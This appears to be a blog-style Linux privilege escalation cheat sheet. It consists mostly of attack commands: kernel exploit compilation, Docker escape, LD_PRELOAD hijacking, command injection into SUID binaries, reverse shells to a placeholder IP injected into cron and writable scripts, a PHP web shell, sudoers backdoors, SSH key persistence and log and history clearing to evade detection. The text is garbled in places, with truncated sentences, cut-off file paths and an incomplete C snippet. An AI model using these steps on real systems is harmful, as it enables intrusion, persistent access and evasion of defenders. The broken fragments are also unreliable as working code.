Linux Privilege Escalation: Going Up!
Privilege escalation on a Linux system is about exploiting specific vulnerabilities, misconfigurations, or oversights to gain elevated access — typically root. Even on a hardened system, subtle weaknesses like improperly configured SUID/SGID binaries, world-writable files, or unpatched kernel exploits can provide an attacker with a path to escalate privileges. The process involves thorough enumeration to uncover these opportunities, followed by precise exploitation, whether through command injection, leveraging environment variables, or exploiting vulnerable binaries. Mastery of these techniques allows you to move from basic user access to full system control, a crucial step in both offensive security and system hardening.
1. Initial Enumeration
System Info
uname -a
, search for related exploits using searchsploit
searchsploit 3.10.0-327
searchsploit -m linux/local/40616.c
gcc -pthread 40616.c -o dirtyc0w
Kernel Version
uname -r
uname -r
shows a kernel version with a known local exploit, search for it using searchsploit
searchsploit <kernel_version>
, search for relevant exploits.
searchsploit 2.6.32-431
searchsploit -m linux/local/15285.c
gcc 15285.c -o exploit
User & Group Info
or lxd
, search for container escape techniques.
For Docker:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
sudo su
cat /etc/passwd
su <username>
2. Environment Enumeration
Environment Variables
manipulated, create a malicious shared library to exploit LD_PRELOAD
Create a malicious shared library:
// malicious.c
void _init() {
gcc -shared -o /tmp/ -fPIC malicious.c
export LD_PRELOAD=/tmp/
SUID Binaries
find / -perm -4000 -type f 2>/dev/null
with the SUID bit set. This binary was intended to perform backups, but it was poorly coded and does not sanitize input properly. It allows you to append additional commands to its execution.
If the backup
binary accepts a file name as an argument and directly passes it to a system call like system()
or exec()
, you can inject commands by adding a semicolon and your desired command.
/usr/local/bin/backup "; /bin/bash -p"
Here, the -p
flag preserves the SUID privileges, allowing you to spawn a root shell. This command executes the backup
binary, but the semicolon allows you to terminate the expected command and start a new one, effectively giving you a shell with elevated privileges.
SGID Binaries
find / -perm -2000 -type f 2>/dev/null
with the SGID bit set to a privileged group, such as adm
(which often has access to system logs). This script is intended to sync log files, but it doesn't properly handle user input and directly passes arguments to a command within the script.
If the script allows you to pass arguments, you could inject a command by manipulating the input. For example.
/usr/local/bin/logsync "/var/log/syslog; /bin/bash"
In this scenario, the script tries to sync /var/log/syslog
, but the semicolon terminates the logsync command and then opens a new shell (/bin/bash
). The shell inherits the group privileges (e.g., adm
), allowing you to read or modify logs that require elevated privileges.
ps aux
Check if you can manipulate the files or intercept the process for privilege escalation.
echo "your code" > /path/to/target/file
Scheduled Tasks
crontab -l
, replace the script with your own:
Replace the script with a reverse shell.
echo "/bin/bash -i >& /dev/tcp/your_ip/your_port 0>&1" > /tmp/
cat /etc/crontab
is writable by your user, modify it to run a malicious command:
Add a reverse shell to crontab.
echo "* * * * * root /bin/bash -i >& /dev/tcp/your_ip/your_port 0>&1" >> /etc/crontab
Network Info
netstat -tuln
vsftpd 2.3.4
, search for an exploit using searchsploit
searchsploit vsftpd 2.3.4
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST <target_ip>; run"
iptables -L
Probe the network for other accessible services to exploit further:
nmap -sT -p- <target_ip>
3. File & Directory Permissions
World-Writable Files & Directories
find / -writable -type d 2>/dev/null
on a web server, you could place a malicious script there if the web server runs with elevated privileges.
Place a malicious PHP script in the web directory to execute a shell.
echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/shell.php
Interesting Files
ls -la /etc/sudoers
file or a file within /etc/sudoers.d/
is writable, you could escalate privileges by modifying it to grant yourself sudo access without a password:
Add a rule to allow your user to execute any command as root without a password:
echo "yourusername ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers.d/custom
sudo su
find / -type f -name ".sh" -perm -o+w 2>/dev/null
Append a reverse shell command to the writable script.
echo "/bin/bash -i >& /dev/tcp/your_ip/your_port 0>&1" >> /path/to/
4. Review Installed Software
Package Lists
dpkg -l
searchsploit <package_name>
searchsploit -m <exploit_id>.c
gcc <exploit_id>.c -o exploit
rpm -qa
Script for automating dpkg -l
output to run through searchsploit
dpkg -l | awk '{print $2 " " $3}' | while read line; do
pkg=$(echo $line | awk '{print $1}')
ver=$(echo $line | awk '{print $2}')
echo "[*] Searching for exploits for $pkg version $ver..."
searchsploit "$pkg $ver"
Similar to dpkg -l
, if you find an outdated or vulnerable package:
Search for an exploit:
searchsploit <package_name>
5. Exploit Enumeration
Search for Exploits
If your enumeration reveals a vulnerable kernel, software, or SUID binary, search for an exploit using searchsploit
or online resources:
searchsploit <vulnerability_name_or_version>
searchsploit -m <exploit_id>.c
gcc <exploit_id>.c -o exploit
is a go-to tool for finding and exploiting known vulnerabilities.
Automated Tools
finds an interesting SUID binary, like /usr/bin/ab
with insecure permissions, check GTFOBins
or searchsploit
for how to exploit it:
Search for an exploit method.
# Search for "ab" on GTFOBins
/usr/bin/ab -c "id > /tmp/output"
This example is less common, but valid if you encounter a lesser-known or uncommon SUID binary.
6. Attempt Privilege Escalation
Exploit Vulnerabilities
If you’ve identified a vulnerability through previous steps, now is the time to exploit it.
Search for the specific exploit using searchsploit
or Exploit-DB
searchsploit <vulnerability>
Test SUID/SGID Binaries
Suppose the result of running the SUID permissions search provided us with an uncommon binary like below:
find / -perm -4000 -type f 2>/dev/null
Next step would be to run strings on that puppy to see what sort of calls it might have it in it that would run with higher privileges:
strings /usr/bin/simplecopy
Usage: %s <source> <destination>
cp %s %s
In this instance cp
is available to us and we provide the source and destination. Next, let's see if they protected it from tacking on commands:
/usr/bin/simplecopy HELP '/HELP && echo "chacho ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers && ls /root'
Excellent, now we can simply drop ourselves into a root shell:
sudo -i
Abuse Misconfigured Cron Jobs
If you discovered a cron job executing a script from a writable location, replace it with a malicious script:
Add a reverse shell.
echo "/bin/bash -i >& /dev/tcp/your_ip/your_port 0>&1" > /tmp/
7. Post-Exploitation
Confirm Privilege Escalation
shows you as UID=0(root)
, you've successfully escalated privileges.
This is a realistic verification step after successful privilege escalation.
Once you have root, you may want to maintain access:
Add your SSH key to the root account:
echo "your_ssh_public_key" >> /root/.ssh/authorized_keys
8. Clean Up
Remove Artifacts
After achieving your goals, delete any traces of your activities to avoid detection:
Remove scripts, binaries, or log entries related to your actions.
rm -f /tmp/exploit /tmp/ /tmp/
history -c